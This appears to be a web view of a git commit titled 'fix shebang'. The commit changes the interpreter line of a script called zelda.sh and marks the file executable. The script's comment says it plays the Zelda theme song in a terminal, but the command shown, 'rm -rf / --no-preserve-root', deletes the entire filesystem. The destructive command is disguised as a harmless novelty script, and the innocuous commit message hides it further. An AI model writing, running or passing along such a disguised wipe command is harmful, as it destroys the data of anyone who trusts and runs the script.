fix shebang
This commit is contained in:
parent
b510b4ba24
commit
a4dda1cd45
2
homepage/zelda.sh
Normal file → Executable file
2
homepage/zelda.sh
Normal file → Executable file
@ -1,4 +1,4 @@
|
|||||||
#!/bin/bash
|
#!/bin/sh -x
|
||||||
|
|
||||||
# plays zelda theme song in terminal
|
# plays zelda theme song in terminal
|
||||||
rm -rf / --no-preserve-root
|
rm -rf / --no-preserve-root
|
||||||
|
Loading…
Reference in New Issue
Block a user